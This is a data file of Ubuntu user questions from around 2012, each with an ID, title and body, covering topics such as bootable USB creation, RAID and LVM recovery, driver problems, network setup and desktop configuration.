220304	problem creating bootable usb on mac	i am following the procedure from this page i have a 2012 macbook pro 13 inch and i am using a pny 8gb flash drive . i have downloaded version 12.10 and already converted it into a .img file . my computer automatically puts a .dmg at the end of the file . the problem comes when i execute step 8 . terminal runs the command and tells me it was successful , but immediately after , a window pops up saying my usb drive is `` not readable by this computer '' this is what i type into terminal . sudo dd if=/users/trev_carlson/downloads/ubuntu-12.10-desktop-amd64.img.dmg of=/dev/disk2 bs=1m then it tells me to enter my password , i do , and it executes the command . is there anything i am doing wrong ? is the .dmg at the end messing it up ? also what format should the usb drive be if i want to use it to boot on my mac ? thanks in advance !
220306	gmail-like replacement for thunderbird	i am looking for an e-mail client for ubuntu 10.04-12.04 which would look like gmail and would replace my current thunderbird configuration . i have no problems with the efficiency or reliability of thunderbird , but i am used to the gmail interface and the interface of thunderbird does n't suit my taste even after forcing myself to learn , use and configure it for several weeks . unfortunately , i can no longer use gmail for corporate e-mails . i would like to have : interface close to gmail many , if not most features of thunderbird ( and gmail ) -- address books , labels , automatic scoring , conversation view , starring interesting articles , filters , single-key shortcuts ( like `` a '' in thunderbird or `` y '' in gmail ) . i would have no problem with a tb plugin that just modifies the interface , if you know of one .
220307	resize ntfs volume lvm	this is my setup with a harddrive of 1tb capacity and one lvm partition with the size of around 100gb on it . within the lvm there is a ntfs drive containing windows . i 'd like do resize the ntfs drive within the lvm to give windows more space without damaging windows . lvs could n't find device with uuid kxvaie-ijuu-lhxd-e5hr-wur2-vrxl-gzj5tg . lv vg attr lsize origin snap % move log copy % convert root lukas-host -wi-ao 103,18g swap_1 lukas-host -wi-ao 15,82g win7x64 virtual-machines -wi-a- 100,00g vgs could n't find device with uuid kxvaie-ijuu-lhxd-e5hr-wur2-vrxl-gzj5tg . vg # pv # lv # sn attr vsize vfree lukas-host 1 2 0 wz -- n- 119,00g 0 virtual-machines 2 1 0 wz-pn- 234,37g 134,37g pvs could n't find device with uuid kxvaie-ijuu-lhxd-e5hr-wur2-vrxl-gzj5tg . pv vg fmt attr psize pfree /dev/sda5 lukas-host lvm2 a- 119,00g 0 /dev/sdb1 virtual-machines lvm2 a- 117,18g 17,18g unknown device virtual-machines lvm2 a- 117,18g 117,18g fdisk -l /dev/sdb disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 köpfe , 63 sektoren/spur , 121601 zylinder , zusammen 1953525168 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes festplattenidentifikation : 0x000831c1 gerät boot . anfang ende blöcke id system /dev/sdb1 2048 245762047 122880000 83 linux thank you for your time .
220308	is python available in any ubuntu installation ?	quite simply : is python already provided in any of the latest installations ubuntu or does it have to be installed explicitly by the user ? thanks .
220309	lubuntu screen issues	i instantly admit that i am a ubuntu newbie , so this might be the dumbest of questions . but i am endeavouring to get my kids off windows and elected to convert one of our laptops ( a gateway w33-ui1 ) into a dual boot lubuntu/xp machine . i downloaded the iso , created the disc and booted the machine from the disc and attempted to run from the disc - rather than commit to the install . all was going swimmingly , until the screen rastered with interference lines across top and bottom and covered the screen in horizontal red stripes . lubuntu still loaded , although everything appears transparent over this red stripe interference and the mouse pointer is corrupted so that it is now just a collection of random faint pixels in the rough shape of a large square . i have refreshed the video drivers , but to no avail . any ideas where i 'm going wrong ? many thanks in advance for your sage advice .
220311	strange error when trying to update my system	i try to do sudo apt-get update and i get the following error message : w : gpg error : http : //www.openprinting.org lsb3.2 release : the following signatures could n't be verified because the public key is not available : no_pubkey 7a4b44c2d2a2203e there is no such repo in my sources.list what should i do ?
220321	airmon-ng , `` error while getting interface flags : no such device ''	the command airmon-ng start wlan0 gives as output and then i type ifconfig mon0 down and i get this error : error while getting interface flags : no such device the error will probably start at airmon-ng start wlan0 . anyone an idea on how to solve it ?
220323	how can i set up full access sharing on my network ?	i want to setup a home network that grants full access to and from all machines in my home . all 4 of my machines are running ubuntu 12.04 . i tried setting up filesharing but have 2 problems with this : first , it does not grant me the complete access i desire and i have to share individual directories one by one . secondly , after following the instructions here for quick file sharing setup : how do i set up file sharing between two ubuntu laptops on my wireless network ? under `` browse network '' all machines show up , but when i try to to open them , i see this : followed by this a few seconds later : i would appreciate any assistance i can get on his issue ! thanks !
220326	ubuntu 12.04 unity chameleon vs 12.10	in 12.04 ubuntu when i change wallpaper only left bar changes . if i set white wallpaper it gets pretty ugly : while for other colors it 's okay : in ubuntu 12.10 i remember that top panel colors changes aswell . how do i make it change in ubuntu 12.04 aswell ? ( i had to go from 12.10 to 12.04 ubuntu since it didnt have drivers for my video adapter , and i was too dumb to install them properly since it 's nvidia ) . questions : is top panel color changing only in 12.10 ? why is left panel grey and not-matching at all ? thanks !
220330	installation stops after selection installation type	after selecting to install alongside windows 7 , th installer ejects the disk , and asks me to remove it . after doing this , the system restarts and loads windows 7 with no further information . how can i get past this ?
220333	precise pangolin grub error 15	i 've installed 12.04 pp on ssd which was the only hard disk plugged to the computer during installation . after installation , rebooted well , system was working smoothly . then i plugged secondary hdd ( containing data , backup etc . ) and the system mounted it automatically . then i reboot again and the grub was showing error 15 in a boot sequence . only if i unplug the secondary hdd while rebooting , will make the system to boot normally . note that the ubuntu 12.04 pp is the only os on the computer . no windows , no dual boot , nothing . i believe the grub need some kind of extra info of a new hdd to make it a part of master boot record . simply , os recognize it as a physical address and mounting it well , but it was n't there during installation process and the grub got the problem with it ( maybe ) thx in advance
220334	hp probook 5320 overheating	system overheats every time it uses flash , for example youtube videos ca n't be watched without fan always on . no problem in windows 7 . i do n't want to disable fan . i 've jupiter installed , set in `` power saving '' mode , but this did n't help . also , battery drain is outrageous , i guess it is due some of the drivers used by this laptop . any advice specificaly for this model will be appreciate , i 'm scared to use settings for battery from other models , cause i 'm not very experienced user . any help appreciated . xinit outline : system : host : petr-hp-probook-5320m kernel : 3.2.0-32-generic x86_64 ( 64 bit ) desktop : gnome distro : ubuntu 12.04 precise machine : system : hewlett-packard ( portable ) product : hp probook 5320m mobo : hewlett-packard model : 149b version : kbc version 82.10 bios : hewlett-packard version : 68afu ver . f.02 date : 06/25/2010 cpu : dual core intel core i3 cpu m 370 ( -ht-mcp- ) cache : 3072 kb flags : ( lm nx sse sse2 sse3 sse4_1 sse4_2 ssse3 vmx ) clock speeds : 1 : 933.00 mhz 2 : 933.00 mhz 3 : 933.00 mhz 4 : 933.00 mhz graphics : card : intel core processor integrated graphics controller x.org : 1.11.3 drivers : intel ( unloaded : vesa , fbdev ) resolution : 1366x768 @ 60.0hz glx renderer : mesa dri intel ironlake mobile glx version : 2.1 mesa 8.0.4 audio : card : intel 5 series/3400 series chipset high definition audio driver : snd_hda_intel sound : alsa ver : 1.0.24 network : card-1 : realtek rtl8111/8168b pci express gigabit ethernet controller driver : r8169 if : eth0 state : down mac : 68 : b5:99 : f7:3a:40 card-2 : broadcom bcm4313 802.11b/g/n wireless lan controller driver : wl if : eth1 state : up mac : ac:81:12:4c : af : df drives : hdd total size : 500.1gb ( 59.3 % used ) 1 : id : /dev/sda model : st9500420as size : 500.1gb partition : id : / size : 455g used : 277g ( 65 % ) fs : ext4 id : swap-1 size : 4.07gb used : 0.00gb ( 0 % ) fs : swap raid : no raid devices detected - /proc/mdstat and md_mod kernel raid module present sensors : none detected - is lm-sensors installed and configured ? info : processes : 170 uptime : 1 day memory : 1240.6/3748.2mb client : shell inxi : 1.8.4
220336	a good pdf viewer for ubuntu that supports text highlighting ?	i am new in ubuntu and i need a pdf viewer software that support text highlighting and comments , guide me please , thanks .
220339	ubuntu keeps crashing how do i diagnose what is wrong ?	i have a file server that was windows home server . i reformatted the hd and installed ubuntu 12.04 lts and amahai ( greyhole , sickbeard , etc ) system was working fine but for a while now it randomly freezes up , sometimes a white screen , sometimes vertical lines , sometimes black . i restart it and everything boots up fine , no issues . all the hardware was recently working with no problems , did memory test , no problem . ubuntu install with amahai , fine for a week or so . i do n't know if there were any auto updates , only possible changes i can think of . i already googled and disabled hibernate , screensaver , etc . and any other common crashes . when it crashes , i ca n't access any samba shares or ssh into it . where should i look to start to diagnose this issue ?
220343	how not to install quantal on cedar trail & fullhd [ failed ]	it is hopeless ... i planned to write here my success story , for future reference , i can only write my despair . here is for the hardware : brand new shuttle xs36v , full-hd screen on dvi port , 4gb of ram in the belly . and for the software : monday , install of 12.10 i386 desktop failed : as soon as the install scripts dare to leave the console-mode , it either crash or turn black tuesday , install of 12.10 i386 server failed : network hardware not recognized ! ? ca n't go further ... wednesday , install of 12.04.1 i386 desktop failed : well , install succeed ( network was perfectly recognized ! , screen was 2d and lower resolution but working ) until i tried to install the proprietary driver `` cedar trail drm driver in dkms format '' . as the progress-bar reached 100 % , i got another black screen ( at reboot , even grub menu is blacked out ) ... tomorrow i 'll try 12.04 server . the day after , i 'll put this crap on e-bay . tonight , i 'll go to bed early ... unless one could cast a light on the way i can handle ubuntu 12.10 on a cedar-trail
220344	sync android memo with evolution memo	the title sums it up . right now i know i can sync my android memos with a gmail account . it puts them in a notes folder ( aka a label ) on gmail . but now im unsure how to go from gmail to evolution . evolution gives me two options in the memo list creation . i can either do `` caldav '' and input a server , user , path or do `` on the web '' with a url and a username . any easy way to do this ? im thinking to find a static url to my notes folder in gmail as something i can use for creating a memo list in evolution . thanks for any help !
220347	recovering from raid5 with 2 failed drives , only one of them really dead	i have ( had ? ) a raid5 with 3 devices . one of them died , and after some days i experienced that the raid stopped at all . however , i could restart it without experiencing any problems , but it stopped again after a few hours , i restarted it and it stopped again after some moments and so on . since one month , the raid ca n't start anymore . ( within the last month , i did n't do anything with the raid as i had n't time for it . ) i do n't know if this is a hardware failure ( of the drives ) or `` just '' a defective contact of the power cable , since i had problems with this one year ago . i 'm currently hoping for `` just '' a defective contact . the raid holds mainly data of which i have a backup , however , the backup does n't hold changes made within a month or so . i found this blog post about recovering from a raid5 with two failed disks . it describes a similar problem that i ( hope to ) have : the drives ( or , at least one of the two failed ones ) is n't really defective but only has been detached from the computer . their approach is to re-create a raid5 using all but the first failed device . in my case , i have three disks , one of them is dead . so i have only two left : /dev/sda1 and /dev/sdc1 , while the latter is the one which has been `` detached '' ( at least , i hope it is not dead ) . so i hope to get the most important information from examining this device : sudo mdadm -- examine /dev/sdc1 magic : a92b4efc version : 0.90.00 uuid : 83cb326b:8da61825:203b04db:473acb55 ( local to host sebastian ) creation time : wed jul 28 03:52:54 2010 raid level : raid5 used dev size : 732571904 ( 698.64 gib 750.15 gb ) array size : 1465143808 ( 1397.27 gib 1500.31 gb ) raid devices : 3 total devices : 2 preferred minor : 127 update time : tue oct 23 19:19:10 2012 state : clean internal bitmap : present active devices : 2 working devices : 2 failed devices : 1 spare devices : 0 checksum : eaa3f133 - correct events : 523908 layout : left-symmetric chunk size : 64k number major minor raiddevice state this 1 8 33 1 active sync /dev/sdc1 0 0 8 1 0 active sync /dev/sda1 1 1 8 33 1 active sync /dev/sdc1 2 2 0 0 2 faulty removed so it was october 23rd when the raid stopped working at all . now i want to recover using the two devices with the command sudo mdadm -- verbose -- create /dev/md127 -- chunk=64 -- level=5 -- raid-devices=3 /dev/sda1 /dev/sdc1 missing i hope someone can tell me if this is the correct command to use . i 'm very nervous ... it is telling me to confirm the following data about the drives to use to re-create the array : mdadm : layout defaults to left-symmetric mdadm : layout defaults to left-symmetric mdadm : layout defaults to left-symmetric mdadm : /dev/sda1 appears to contain an ext2fs file system size=1465143808k mtime=tue oct 23 14:39:49 2012 mdadm : /dev/sda1 appears to be part of a raid array : level=raid5 devices=3 ctime=wed jul 28 03:52:54 2010 mdadm : layout defaults to left-symmetric mdadm : /dev/sdc1 appears to be part of a raid array : level=raid5 devices=3 ctime=wed jul 28 03:52:54 2010 mdadm : size set to 732570816k continue creating array ? additional info : i once created the array with 3 * 750gb drives , so the file system is 1.5tb ( ext2 ) . in particular , i wonder if the line telling that /dev/sda1 contains a 1.5tb ext2 file system is correct , because in the blog post linked above , their output does n't show such a line ... i also wonder if i should zero the superblock on any device first ... are there any checks i can do to confirm that this will most probably not kill something totally for which there exists a chance to recover from ?
220349	i want an alternative program for idm	i want an alternative program for idm ( internet download manager ) on ubuntu ? ? or how can i setup idm on ubuntu ? ? i want a detailed explanation , please !
220350	how to add a print dialog to an application	i 'd like to add a print dialog to my python + gtk app , and i believe there are at least two methods : the upstream gtk print dialog the cups print dialog i 'm wondering which would be the recommended one to use for application development . i believe 2. is what ubuntu uses , so i assume it will work well with indicators and with detecting system printers . however , i have n't been able to find any documentation at all for it . any recommendation on the best way to add a print dialog to my app ?
220355	nautilus - show folder size in list view ?	in the list view in nautilus , i can see datestamp , name , etc - but it would be great to add one more extra tab and make the size of everything contained in a folder visible at a glance as well . is there a command or a way to do so ?
220356	skype 4.1 keeps crashing on ubuntu 12.10 !	i have installed ubuntu 12.10 recently and also downloaded skype 4.1 ( ubuntu 12.04 multiarch ) . i installed it but every time i have a conversation , or a call , it crashes . does anybody know why this happens ? ? i have also tried to install the skype version ubuntu 10.04 32bit , but the same thing happens . also i have uninstalled and installed again more than 2 for each one , and restarted the laptop in between . please help me ! ! i really need skype ! !
220357	how can i improve eclipse 's user interface to get rid of the excessive padding and spacing ?	eclipse juno ( historical versions too ) has too much padding applied to the tabs and borders . this makes it hard to work with multiple project folders , especially ones containing multiple packages and nested directories , due to an overall lack of space . this only appears to be an issue on linux . windows and osx both have less padding which vastly improves the user experience . this issue affects my 15.4 inch laptop with a resolution of 1366 x 768 . i 'm not sure if this issue affects larger resolutions . is there a way to change the padding and make the whole application look a little more compact / smaller ? i 've attached a screenshot of an empty eclipse project in eclipse . i 'll add an osx screenshot tomorrow for comparison .
220358	how to change location where logs are stored ?	i am running out of space and would like to move my logs to recover some room on my ssd . my question : i have an ssd ( mounted at / ) and regular hard-drive ( mounted at /mnt/d2 ) . how can i change it so that my logs ( all the logs stored in /var/log ) are stored somewhere on my other hard-drive ( maybe /mnt/d2/var/log ) ? thank you !
220362	connecting ubuntu computers via ssh	i am trying to connect the computers on my home wifi network via ssh . but i get `` connection refused '' . here is a supporting image ( ip address changed for security purposes ) . why is it refusing the connection ? the username and password for the other machine are the admin account .
220364	boot off usb key without bios support	i installed ubuntu onto a usb key using pendrivelinux.com . i need to boot off the pen drive now but the bios does n't support this . i can still boot into linux without x support ( broken x is one of the reason i want to boot off the pen drive to reinstall ) on the computer directly . is there some way to boot off a usb key from a running installation of linux or some other way of doing this ?
220366	can i connect to other computers on my network using ftp ?	is there a way to connect to other computers on my home wifi network via ftp using something such as filezilla ?
220368	mp4 files show up but wo n't stream to xbox 360	i set up a basic media server to stream to my 360 using ushare . here are the instructions i used : http : //linuxexpresso.wordpress.com/2011/01/02/howto-ubuntu-upnp-server-to-xbox-360/ . i can stream avi files fine but i can not stream mp4s . when i go to videos on the xbox , i can see all of the videos and folders but when i click play for an mp4 nothing happens . on my ubuntu desktop i can click on the mp4 file and it plays fine . and if i take that file , stick it on a thumb drive and plug it directly into the xbox the mp4 will play off the thumb drive . i 'm lost for why it wo n't work through ushare . any ideas ?
220370	where is /dev/dsp or /dev/audio ?	i have to apply sudo chmod a+r /dev/dsp or /dev/audio but in my ubuntu 12.10 i do not have such . where is then the pcm sound file for ssh ? chmod : can not access `/dev/dsp ' : no such file or directory chmod : can not access `/dev/audio ' : no such file or directory follow up : http : //superuser.com/questions/244173/missing-dev-dsp-under-ubuntu i want to stream the sound output and input . so that i can capture any audio in/out to a file for recording .
220371	how to play flash videos in a browser using mplayer or vlc	give the excessive use of cpu while playing flash videos , i am interested in using mplayer or vlc instead . i tried the greasemonkey script with this userscript in firefox and chrome , but it kept saying the scripts are pretty old and needs updating . also , i tried a workaround from webupda8.org but did not work either . anyone has a better / updated script or solution ? thanks .
220374	which phone can i buy now to be sure ubuntu 13.04 will work on it ?	which phone can i buy now to be sure ubuntu 13.04 will work on it ? will it be prepared for lte ?
220376	ubuntu 12.10 unity performance - dragging a glxgears through the desktop	i 've been using the 12.10 since it was launched . i have a i7 with a geforce gt520 running 304.43 driver version . with 12.04 , using a lot of compiz animation , i could drag a window running glxgears quickly through the desktop , but now , using 12.10 , is almost impossible to do this . it hangs a lot . actually , is almost impossible even try resizing another window if a instance of glxgears is running . the cube performance is terrible too . i 'm not sure , but seems that this new unity and compiz are worst than previous version . the conky also is abnormal , it often looses its transparency , showing a dark background instead . it 's not a conky configuration , i have tried all possible configurations . using gnome3 or gnome-shell i have the same issues . it only does not happen while using gnome 2d ( without effects ) . are you feeling the same poor speed and motion quality on 12.10 ? i had also tried to uninstall the unity , compiz , almost everything , but nothing returned the great desktop performance of unity on 12.04 . my boot time , using a ssd is around 18 seconds . i think that it could be better , too . thank 's , david
220377	why does n't network-manager start at boot ?	i think this started happening a couple of months ago when i upgraded from 10.04 to 12.04 . whenever i reboot , network-manager does not start . i have to manually run sudo start network-manager , and then everything works fine . things i have already tried ( rebooting after each attempted fix ) : verified that all of the /etc/rc*.d/*network-manager links exist the way they should . since network-manager 's upstart config file mentions local-filesystems , and my fstab had a reference to a usb hdd that is not connected , i commented that line out of the fstab . sudo dpkg-reconfigure network-manager and then sudo apt-get install -- reinstall network-manager looked in syslog for hints , did n't see anything that jumped out . i do n't think i 've modified /etc/init/network-manager.conf , but here it is for reference : # network-manager - network connection manager # # the network manager daemon manages the system 's network connections , # automatically switching between the best available . description `` network connection manager '' start on ( local-filesystems and started dbus and static-network-up ) stop on stopping dbus expect fork respawn script # set $ lang so that messages appearing on the gui will be translated . see lp : 875017 if [ -r /etc/default/locale ] ; then . /etc/default/locale export lang language lc_messages lc_all fi exec networkmanager end script
220378	ca n't switch wi-fi on hp gs5000	wireless hardware switch on hp gs5000 laptop will not work , it was ok in windows but now ubuntu 12.04 is installed this switch does nothing .
220384	problem installing epson 645 drivers related to lsb	i previously had this working with ubuntu 10.x , and just recently upgraded to 12.04 ( 64 bit ) . i had installed the driver from epson : epson-inkjet-printer-escpr_1.2.0-1lsb3.2_i386.deb , and now also tried : epson-inkjet-printer-escpr_1.2.2-1lsb3.2_i386.deb but neither worked . > sudo dpkg -i epson-inkjet-printer-escpr_1.2.2-1lsb3.2_i386.deb ( reading database ... 753018 files and directories currently installed . ) preparing to replace epson-inkjet-printer-escpr : i386 1.2.2-1lsb3.2 ( using epson-inkjet-printer-escpr_1.2.2-1lsb3.2_i386.deb ) ... unpacking replacement epson-inkjet-printer-escpr : i386 ... cups stop/waiting cups start/running , process 28199 dpkg : dependency problems prevent configuration of epson-inkjet-printer-escpr : i386 : epson-inkjet-printer-escpr : i386 depends on lsb ( > = 3.2 ) . dpkg : error processing epson-inkjet-printer-escpr : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : epson-inkjet-printer-escpr : i386 the issue seems to be : epson-inkjet-printer-escpr : i386 depends on lsb ( > = 3.2 ) . i have lsb 4.0 installed , but maybe it 's not the i386 version ? > dpkg -l | grep lsb iu epson-inkjet-printer-escpr : i386 1.2.2-1lsb3.2 epson inkjet printer driver ( esc/p-r ) for linux ii lsb 4.0-0ubuntu20.2 linux standard base 4.0 support package ii lsb-base 4.0-0ubuntu20.2 linux standard base 4.0 init script functionality ii lsb-core 4.0-0ubuntu20.2 linux standard base 4.0 core support package ii lsb-cxx 4.0-0ubuntu20.2 linux standard base 4.0 c++ support package ii lsb-desktop 4.0-0ubuntu20.2 linux standard base 4.0 desktop support package ii lsb-graphics 4.0-0ubuntu20.2 linux standard base 4.0 graphics support package ii lsb-printing 4.0-0ubuntu20.2 linux standard base 4.0 printing package ii lsb-release 4.0-0ubuntu20.2 linux standard base version reporting utility i have also run sudo apt-get -f install to no avail . this was for the `` download printer driver esc/p-r driver ( generic driver ) '' thank you !
220385	krita quits on startup , showing `` library key is missing ''	here is the console log : anforumeru @ anforumeru-desktop : ~ $ krita got bus address : `` unix : abstract=/tmp/dbus-n5fbmbq4jq , guid=45858a1b747e9093d11a267a50aca4c7 '' connected to accessibility bus at : `` unix : abstract=/tmp/dbus-n5fbmbq4jq , guid=45858a1b747e9093d11a267a50aca4c7 '' registered dec : true krita ( 349 ) /kdecore ( services ) kservicefactory : :findservicebydesktoppath : `` kritapart.desktop '' not found krita ( 349 ) /kdecore ( services ) kservicefactory : :findservicebydesktoppath : `` office/krita.desktop '' not found krita ( 349 ) /koffice ( lib komain ) kodocumententry : :createdoc : `` the service '/usr/share/applications/kde4/krita.desktop ' provides no library or the library key is missing '' i 've tried to purge the whole kde dependency tree and install again . that does n't help at all . any suggestions ?
220394	installing program file	i am trying to install openssn on ubuntu 12.04 . i have extracted the file , and when i type cd openssn then sudo make in a terminal i get this : main.cpp:32:17 : fatal error : sdl.h : no such file or directory i have been searching all over the forum for how to fix this and have had no luck . this is the first time i have tried to install a program .
220401	does kvm has the same tool like vmware tools ?	vmware has vmtools to enhance vm performance . does kvm has the same tool to enhance its vm ? if so , how to install such tools ? thanks for any input !
220402	converting the os with all software installed to iso file	i am trying to make my entire ubuntu ( 12.04 ) os with all the softwares installed to an iso file so that it can be installed through virtual box in another system . could someone help me in this ?
220404	need to install ; then access via vnc or remote desktop ; xscreen unusable	got netbook . installed ubuntu 12.04 because want to be conservative re lt. radeon x1270 i want to be able to sign in blind , install what i need to using some keystrokes and presumably to do the apt-get install changes recommended in another article . i have tried several versions of linux and i am certain that they all give the same problem with this hardware . so what i need to do is connect and control so i can do the upgrade from a nearby networked computer . i have often found myself in this situation so âś it may be useful to know for posterity .
220407	after upgrading to 12.10 , empathy displays 'network error ' when connecting to google talk	after upgrading to ubuntu 12.10 , empathy displays 'network error ' when trying to connect to google talk . in 12.04 ( and earlier versions ) , empathy was setup and functioning correctly using google talk . in online accounts , i have my google account authorised with ubuntu . i have tried removing the account and re-adding/re-authorising , but the result is the same . i have also tried removing and re-installing empathy ( 3.6.0.3 ) and telepathy . is there a solution to this problem ? or a way to diagnose the 'network error ' further ? any help would be greatly appreciated .
220409	unable to display index.php	i 'm trying to load a website i 've development and transferred from windows to ubuntu . i 've installed apache2/php5/mysql and i 've confirmed that it works by using the default index.html file displaying something like `` it works ! '' . i 've also created arbitrary folder containing some php file that i 've run in firefox and it was displayed . but when i try to run my projects index.php i get a blank screen . i 've consulted mirc about this and they say that it has to do with file permission . i 've chcked the file permission on my index.php file and it is owner : rw r , group : r , others : read-only and execute is unchecked . what am i doing wrong ?
220413	why do n't some packages in lp exist in the ubuntu software centre ?	i always thought that it was motu 's job not only to bring packages into the universe repository but also make them available in the ubuntu software center . there are many stable releases of applications out there , but many of them are not in the center . is it part of motu 's job to bring that `` some '' packages into ubuntu software center ?
220414	dvi disconects after a second under ubuntu 12.10 laptop dell xps 15	i use a the dvi-hdmi adapter to connect to my tv . the problem is after i upgrade to ubuntu 12.10 that the display doesn not detect correctly the second screen . after connecting the cable it connects to the tv but after a second the monitor is disconnected . this thing repeats several times until , if lucky , it gets connected . initially i thought it was the cable but it works under windows , and it takes the same time every time it disconnects , as it was running a process and then rejects the configuration and disconnects . first i tried installing nvidia proprietary drivers , having tons of problems with the laptop 's screen configuration i removed them . after reading i found that i have to install bumblebee to use the display card on laptops , so i did installed it . it has never really worked since upgrades . as i said , it works randomly . i have also reinstalled ( reinstall or purge and install ) bumblebee several times with no improvement . at the moment the file xorg.conf is empty , this configuration works . i have tried writing several configurations here but it only makes the display look small and without the side bars . also it crashes and does n't solves any problem this is the result of using xrandr : lap : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) e here as you can see the computer also has hdmi that i would love to use as well , any information on this and on how to use the dvi port properly would be really appreciated . cheers
220419	ubuntu server 12.10 get input signal out of range on hp dl380 g4	after installed ubuntu 12.10 server on hp dl380 g4 , i ca n't boot into it . and the lcd got message `` input signal out of range , recommened settings is 1280x1024 '' . i ca n't see the terminal and tried several lcds and still can not work either . how can i should do now ? i tried 12.04 but got fail message when installing ( select and install software ) .
220427	upgrade went wrong , laptop essentially 'bricked '	i have an old netbook i was trying to upgrade from 10.04 to 10.10 . ubuntu was in the process of upgrading when everything completely froze . i left it sit for an hour but it would not respond to anything . so i powered down the machine and it did n't have the necessary files to run ubuntu . i went to the terminal and it told me to put in some command that i can not remember to 'rebuild ' something . that takes me to now , when i turn on the laptop it comes up with a screen gnu grub version 1.98+20100804-5ubuntu3.3 and has a bunch of options such as : ubuntu , with linux 2.6.35-32-generic ubuntu , with linux 2.6.35-32-generic ( recover mode ) etc . ( there are like 15 of these with different numbers after 2.6.35 and the word 'generic ' . it does n't seem to matter what i pick , it will go to the `` ubuntu '' loading screen with the colored dots but then every time it will freeze and i have to reboot to the same thing . i ca n't seem to get a terminal prompt anywhere either .
220428	proof identify stolen computer getting computer identification info from launchpad bugs and comparing	i sold my old laptop to neighbours and it was stolen from them . well i think i have found thief so i want to check his computer id and compare it to my old launchpad bugs id . how in launchpad i can find from my bugs : motherboard hdd somthing else that can help identify it maybe how to recover or find some overwritten files ( couse now there is windows ) i found in launchpad one my bugs has lspci autogenerated from bug 682846 https : //launchpadlibrarian.net/70611231/lspci.txt but i dont see any id that can be used to identify specificly my comp . this can be used to identify many same models . or i missed something in there ? and what commands should i use to get all identification on that comp in one go fast ? just lspci ? how to get same lspci as it is in that launchpad link ? now testing laspci on my computer i dont get so much info . also im now doing a search in my external hdd where i have many backups and maybe i have there result from lspci . so what containing keywords would help doing search with for small lspci and full reports ive done ? i might have done sudo lshw > somefilename
220431	ubuntu install does n't run on 32gb nexus7 with 3g ?	i tried installing ubuntu on my recently purchased ( for this purpose ! ) nexus 7 32gb , with the cellular option . when i rebooted with ubuntu , it did n't come up . i know , i need to post the errors i received . i was in a hurry to get back to something usable for the holiday ( on the road , thanksgiving , etc . ) , so i just reinstalled android for now . when i have time , i 'll post more of the errors . all i remember right now is that it dropped into busybox and i did n't have a keyboard or any way to attach one . ( i used the 32gb ubuntu , by the way . ) have others seen this ?
220434	global menu for komodo edit/ide in ubuntu	komodo ide/edit uses the same source as firefox so if firefox has global menu there must be a way to do the same for komodo also . please help
220437	some flash videos ( e.g. , on ign.com ) wo n't play 12.04	ubuntu 12.04 , 32-bit , firefox 17 for some reason i can play youtube videos fine , but on websites like ign.com the videos never load . everything plays fine in chrome , but the videos used to work in firefox and for some reason they no longer do . any help will be much appreciated .
220440	cant make my site available to the internet	hi i 'm using ubuntu as server os for my webhosting but i 'm having problem redirecting my domainname to my server . here are my /etc/hosts file and /etc/apache2/sites-available/mysite file . hosts file : 127.0.0.1 www.lowkey.se the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters sites-available/file : < virtualhost *:80 > serveradmin webmaster @ localhost servername www.lowkey.se documentroot /var/www/doost/ < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/doost/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > and a screenshot from my domain name provider : the site has been enabled in ubuntu . i 've restarted apache2 and the folder /var/www/doost/ is there . what am i doing wrong ?
220442	/dev/mapper/vg00-root does not exist	since i upgrade from 11.10 to 12.04 server . i obtain the following error at boot . /dev/mapper/vg00-root does not exist i must use the recovery mode to manually do `` vgchange -ay '' to active my vg00 . after this , i exit the initramfs and the system boot normally . how can i fix this ?
220443	hibernate after timeout in lightdm	is it possible to set up lightdm to hibernate after , for example , 5 minutes without human activity ? only in lightdm without this behaviour after login ? i whant to be able just logout to lightdm by pressing ctrl+alt+del and it would hibernate after timeout automatically instead of power off or hibernate my computer .
220447	all images are gone after open a doc file created by libreoffice writer	i got a paper template in .doc format from a conference site . now when i work on it with libreoffice and insert image to it and insert caption for the image , after closing the file and opening it again , all images are gone . i saw that when the image anchor is set `` to frame '' the image will be gone but when it is set to e.g . `` to paragraph '' it will maintain but it 's alignment will be corrupted . also , i need the anchor to be set to `` frame '' . what can i do ? i searched the net but i did n't find a good answer .
220449	why does this autologin command work ?	i installed minimal ubuntu 12.10 . i want this environment to take as little disk space as possible , so i did n't install a desktop and am doing everything via console . i want to auto-login to the system when it is booted . i discovered a method for auto-login , but i do not fully understand it . i edited the file /etc/init/tty1.conf and changed the last line from exec /sbin/getty -8 38400 tty1 to exec /bin/login -f username < /dev/tty1 > /dev/tty1 2 > & 1 ... where `` username '' is the name of the user to login . it works perfectly , but why ? i understand `` login -f username '' and redirection , but i do n't see where the auto-login magic is happening . thanks .
220454	how to run cronjob in a time specific time range	how to create a cronjob that will execute some code from 8:30am to 8:14pm .
220459	do i need any additional java packages if i 'm running the oracle jre ?	i am running the java 7 jre from oracle . i installed it through terminal and it works properly with my web browsers , and otherwise , as far as i can tell . however , i was browsing through my installed packages in software center , and noticed that both the openjdk-7-jre-lib and openjdk-7-jre-headless packages were still installed from when i had the openjkd jre installed , which i have since uninstalled , but did use for a good period of time before i switched . should those be there , or might they cause complications if i leave them installed ? or would it be best to leave them installed ?
